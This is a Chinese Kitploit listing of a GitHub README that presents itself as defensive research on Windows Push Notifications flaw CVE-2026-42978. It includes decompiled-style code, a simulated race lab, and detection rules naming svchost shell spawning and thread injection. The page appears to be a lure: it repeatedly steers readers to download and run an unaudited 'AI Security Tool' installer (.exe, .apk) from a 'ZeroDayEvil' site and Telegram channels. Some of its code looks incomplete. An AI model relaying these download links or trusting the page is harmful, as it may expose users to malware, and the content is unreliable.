Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-42978-PoC-Research — CVE-2026-42978 Windows 推送通知 (WpnService) 释放后使用与竞态条件 PoC 研究、诊断扫描器,以及面向 AI 安全工具的安全审计模块。 | Kitploit
工具/GitHubGitHub/syntaxmethod/cve-2026-42978-poc-research
防御工具权限提升漏洞扫描器漏洞分析漏洞利用威胁情报论文与研究学习与教育

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
GitHub
syntaxmethod/cve-2026-42978-poc-research

CVE-2026-42978-PoC-Research

CVE-2026-42978 Windows 推送通知 (WpnService) 释放后使用与竞态条件 PoC 研究、诊断扫描器,以及面向 AI 安全工具的安全审计模块。

查看仓库网站
1317小时25分前尚未审核

CVE-2026-42978
面向 AI 安全工具的 Windows 推送通知模块

下一代 AI 安全生态系统、多协议终端与自主代理套件


Latest Release Build Status Donations Telegram Channel License

网站 · 产品文档 · 宿主应用 · 社区聊天

网站导航: 首页 · 更新 · 下载 · 模块

Module banner


官方宿主应用

产品: AI Security Tool
站点: zerodayevil.github.io
文档: https://zerodayevil.github.io/ai-security-tool

本模块是面向 AI Security Tool 的经审核分析报告与安全检查配置。
仅使用项目站点或官方目录中列出的模块。请在经批准的应用程序内加载本模块,并仅针对你拥有或获得书面授权进行评估的端点使用。

本仓库不提供针对 WpnService 的武器化漏洞利用程序。lab/ 下的实验环境是该类漏洞(TOCTOU / 双重取值)的独立模拟实现。它不会与真实的推送通知服务通信。


快速开始与安装

请先安装宿主应用。然后从 Modules → Windows / Local EoP → CVE-2026-42978 启用本模块。

开箱即用的构建版本

仅限官方来源:

  • https://zerodayevil.github.io/
  • https://zerodayevil.github.io/ai-security-tool
  • https://github.com/ZeroDayEvil/ai-security-tool

概念概述

CVE-2026-42978 是 Windows 推送通知中的本地权限提升漏洞。Microsoft 将其描述为对共享资源的并发访问缺乏适当同步(CWE-362)。对已修补与未修补 wpncore.dll 的研究表明,在平台关闭期间 PresentationEndpointFacade 中存在释放后使用竞态。

WpnService 以 NT AUTHORITY\SYSTEM 身份在会话 0 中运行(svchost.exe -k netsvcs -p)。Toast、磁贴和徽章通知的传递都经过它。针对该进程赢得竞态意味着本地机器上的 SYSTEM 权限问题——而不是远程预认证的域控漏洞。

状态: 已于 2026 年 6 月 10 日(补丁星期二)修补。本页面为防御性研究。

它不是 CVE-2026-41089(Netlogon RCE)。组件不同、权限模型不同、补丁日期不同。


规格说明


影响范围

随附推送通知的客户端和服务器 SKU。在关闭工单之前,请在 MSRC 上确认确切的 KB 编号。

系列说明
Windows 101809、21H2、22H2(适用时包括 x86 / x64 / ARM64)
Windows 1123H2、24H2、25H2、26H1
Windows Server2016 / 2019 / 2022 / 2025(完整版和组件存在的 Server Core 版)

根据公开服务说明整理的参考构建版本(请始终重新核对 MSRC):


根本原因(研究)

该外观类封装了通知 API 调用,并委托给 PresentationEndpointImpl。在平台关闭期间,NotificationPlatform 对象会被销毁。历史上,若干外观方法在获取平台指针时没有关闭标志或共享锁。如果销毁过程赢得竞态,下一次调用就会使用悬空指针。

Facade, platform, shutdown guard

相同的加锁与防护模式被应用于 49 个 PresentationEndpointFacade::* 方法。底层的实现方法保持不变——漏洞位于外观层。

未修补形态(wpncore.dll 26100.8521)

root@kitploit:~
// PresentationEndpointFacade::ToastUnblockAll — unpatched
long ToastUnblockAll(PresentationEndpointFacade *this) {
    NotificationPlatformHandle::Get(this + 0x50);
    if (platform == NULL)
        Throw_Hr(...);
    return PresentationEndpointImpl::UnblockToastsForEachApp(...);
}

已修补形态(wpncore.dll 26100.8655)

root@kitploit:~
// PresentationEndpointFacade::ToastUnblockAll — patched
long ToastUnblockAll(PresentationEndpointFacade *this) {
    if (Feature_4097557817::IsEnabled()) {
        AcquireSRWLockShared(&Wns::s_platformLock);
        if (Wns::s_platformShutdown)
            Throw_Hr(E_APPLICATION_EXITING);
        NotificationPlatformHandle::Get(this + 0x50);
        ReleaseSRWLockShared(&Wns::s_platformLock);
    }
}

Ghidra with unpatched and patched wpncore.dll open

补丁新增的内容:

  1. AcquireSRWLockShared —— 读写锁;关闭过程获取独占锁。
  2. s_platformShutdown —— 如果销毁已开始,则以 E_APPLICATION_EXITING 退出。
  3. 通过 WIL unique_storage 实现 RAII 释放,因此锁在异常路径上也会释放。
  4. 功能标志 Feature_4097557817,用于分阶段推出 / 回滚。

二进制差异的规模

来自 reports/ 的 PE 说明:

  • .text 增长了 18,432 字节
  • .data 增长了 96 字节(Wns::s_platformLock、Wns::s_platformShutdown)
  • 没有新增导入——SRW 锁 API 原本就已存在
  • 新增了用于释放独占锁的 RAII 析构函数

影响

WpnService 以 SYSTEM 身份运行。如果赢得竞态,悬空的虚表调用可被转化为本地 SYSTEM 代码执行。该步骤——堆喷射、虚表劫持、载荷——不在本文讨论范围内。

本模块用于根本原因认知、补丁验证和检测。


在 AI Security Tool 中使用本模块

  1. 从 zerodayevil.github.io 安装当前官方构建版本。
  2. 打开 Modules → CVE-2026-42978。
  3. 将检查指向已授权的 Windows 端点。
  4. 将结果视为补丁存在性 / WPN 态势,而非“触发竞态”。
  5. 可选:将检测包(detection/)收集到实验机器上。

不要针对生产环境的 WpnService 运行崩溃或竞态循环。

root@kitploit:~
authorized operator
        │
        ▼
 AI Security Tool  →  module 42978
        │
        ▼
 authorized Windows endpoint
        │
        ├─ patch / wpncore.dll age
        └─ SIEM / Sysmon / Event Log notes

TOCTOU 实验环境(仅模拟服务)

lab/ 是双重取值 / TOCTOU 的独立 C 语言演示。它使用命名管道和共享内存。它不会加载 wpncore.dll,也不会启动或停止 WpnService。

  • vulnerable_service.exe —— 校验一次长度,休眠,再次读取长度。
  • race_attacker.exe —— 在该时间窗口内翻转共享值。
  • --patched —— 单次取值到局部变量;同一攻击者应观察到零次竞态。

需要 GCC(MinGW)。在 lab/ 目录下执行:

root@kitploit:~
build.bat

终端 1:vulnerable_service.exe
终端 2:race_attacker.exe 5
然后与 vulnerable_service.exe --patched 进行对比。

TOCTOU race condition demo


检测与威胁狩猎

ETW 监控 —— detection/etw_wpn_monitor.ps1

七项检查:

  1. WpnService 状态与 PID
  2. 崩溃 / 重启历史
  3. Push Notifications Platform 事件日志突发
  4. 与 WPN 相关的命名管道
  5. 补丁提示(wpncore.dll 日期 / 构建版本)
  6. 加载了 WPN 模块的进程
  7. 通知数据路径下的联接点 / 符号链接审计
root@kitploit:~
powershell -ExecutionPolicy Bypass .\detection\etw_wpn_monitor.ps1

ETW monitor output

Sysmon —— detection/sysmon_wpn_race_detect.xml

root@kitploit:~
sysmon64.exe -accepteula -i detection\sysmon_wpn_race_detect.xml

事件查看器

通道:Microsoft-Windows-PushNotifications-Platform/Operational

  • 事件 1225 —— 传输层 WPN 命令
  • 突发速率(例如 >20/分钟)—— 值得关注,但不足以定罪
  • 错误 / 严重 —— 可能因失败尝试导致崩溃

Event Viewer WPN operational log


缓解措施清单

  • 在所有范围内的 SKU 上安装 2026 年 6 月累积更新
  • wpncore.dll 构建版本与该分支的已修补版本一致
  • 在工作站和跳板机上部署 EDR / Sysmon,而不仅限于域控
  • 对 svchost -k netsvcs 生成 shell 的行为发出告警
  • 将宿主应用模块结果与热修复清单一起归档

如果 etw_wpn_monitor.ps1 显示未修补——请安装 2026 年 6 月更新并重新检查。


相关 CVE(2026 年 6 月 WPN 集群)


仓库结构

root@kitploit:~
CVE-2026-42978/
├── README.md
├── LICENSE
├── lab/
│   ├── vulnerable_service.c
│   ├── race_attacker.c
│   └── build.bat
├── detection/
│   ├── etw_wpn_monitor.ps1
│   └── sysmon_wpn_race_detect.xml
└── reports/
    ├── PE_DIFF_REPORT.txt
    └── FUNCTION_DIFF_REPORT.txt

需求: 检测脚本需要 Windows 10/11 · 模拟实验环境需要 MinGW · Sysmon 可选。

本 README 中的截图从公开图片 URL 加载。它们不存储在此目录树中。


参考资料

  • MSRC — CVE-2026-42978
  • CVE 记录
  • BDU:2026-08249

安全模块目录

远程代码执行与网络问题 4 modules
  • CVE-2026-41089 — Windows Netlogon 模块 · @ZeroDayEvil
  • CVE-2026-20805 — Windows RCE 模块 · @ZeroDayEvil
  • CVE-2026-41096 — 严重 RCE 检查模块 · @ZeroDayEvil
  • CVE-2026-24291 — 网络协议模块 · @ZeroDayVPN
权限提升与服务 2 modules
  • CVE-2026-66804 — CrossDevice 服务 EoP · @ZeroDayVPN
  • CVE-2026-42978 — Windows 推送通知 EoP(本仓库) · @ZeroDayEvil
研究与分析报告 2 modules
  • CVE-2026-50416 — 本地权限提升分析报告 · @ZeroDayEvil
  • CVE-2026-83991 — 分析报告模块 · @ZeroDayVPN

贡献与社区

有价值的工作:

  1. 事实——MSRC 构建版本、6 月 WPN 集群中的同类 CVE。
  2. 检测——Sigma、更好的 ETW、ASR 建议。
  3. 宿主应用元数据与翻译。
  4. 文档与失效链接修复。

请勿提交添加针对 WpnService 的武器化漏洞利用程序、堆喷射辅助工具或针对实时服务的漏洞 PoC 的 PR。


联系与支持

  • 网站: zerodayevil.github.io
  • 产品文档: zerodayevil.github.io/ai-security-tool
  • Telegram 管理员: @ZeroDayEvil
  • Telegram 聊天: @ZeroDyaTool_chat
  • Telegram 频道: @ZeroDyaTool_channel
  • Open Collective: opencollective.com/ZeroDayEvil

许可证与法律

基于 MIT 许可证发布。参见 LICENSE。

仅限经授权的防御性研究与系统管理。
未经书面授权的本地权限提升测试属于违法行为。

该漏洞已被修补。请保持 Windows 为最新版本。本仓库不包含针对实时服务的武器化漏洞利用程序。


AI Security Tool —— 面向网络安全专业人员的终端工作流与自动化。

面向 zerodayevil.github.io 的防御性模块 · 无独立 WpnService 漏洞利用程序 · 请在 MSRC 上核实事实

下载工具
操作系统 / 平台版本架构 / 格式更新时间状态下载
Windowsv6.3.20x64 安装程序(.exe)2026-09-08最新下载 .exe
Windowsv6.3.20x64 便携版(.tar.gz)2026-09-08最新下载 .tar.gz
macOSv5.3.29Apple Silicon(.dmg)2026-09-05稳定下载 .dmg
Linuxv5.3.27通用 x64(.tar.gz)2026-09-01稳定下载 .tar.gz
Androidv5.3.27ARM64 APK(.apk)2026-09-01稳定下载 .apk
字段值
CVECVE-2026-42978
BDUBDU:2026-08249
厂商公告MSRC — Windows Push Notifications EoP
严重性高 · CVSS 3.1 7.8
弱点CWE-362 竞态条件 · 关闭路径上的释放后使用
组件Windows Push Notifications · WpnService · wpncore.dll
攻击向量本地
所需权限低(已授权的本地用户)
用户交互无
补丁星期二2026 年 6 月 10 日
模块类型研究分析报告 + 应用内安全检查 + 检测包
分支参考已修补构建版本
Windows 11 23H222631.7219
Windows 11 24H226100.8655
Windows 11 25H226200.8655
Windows 11 26H128000.2269
wpncore.dll 示例(24H2)易受攻击 26100.8521 → 已修补 26100.8655
类别示例函数
ToastToastUnblockAll、ToastCreateSession、ToastCloseSession、ToastRequestAllNotifications、ToastSuppress
磁贴TileCreateSession、TileCloseSession、TileRequestResourceForeground
注册RegisterApplication、UnregisterApplication、RegisterHandler、UpdateRegistration
设置ChangeAppSetting、QueryAppSetting、QueryGlobalSetting
传递Deliver、GetPayloadForNotificationId、Submit、PostScheduledNotification
查询GetRegisteredHandler、GetSettingsFromHandler、GetAssetsFromHandler
规则用途
WPN_EoP_ChildProcesssvchost(netsvcs)生成 cmd / powershell / wscript
WPN_PipeAccess连接到与 WPN 相关的命名管道
WPN_FileCreation在通知数据目录下创建文件
WPN_RegistryTampering写入 PushNotifications 注册表项
WPN_ProcessAccess对 svchost 的 PROCESS_ALL_ACCESS
WPN_ThreadInjection向 svchost 注入 CreateRemoteThread
CVE类别
CVE-2026-42977EoP · 竞态
CVE-2026-42978EoP · 竞态(本模块)
CVE-2026-42979EoP · 竞态
CVE-2026-42991EoP · 竞态
CVE-2026-42969信息泄露 · 竞态
CVE-2026-42970信息泄露 · 竞态
CVE-2026-42973信息泄露 · 竞态
CVE-2026-26167EoP
CVE-2026-32160EoP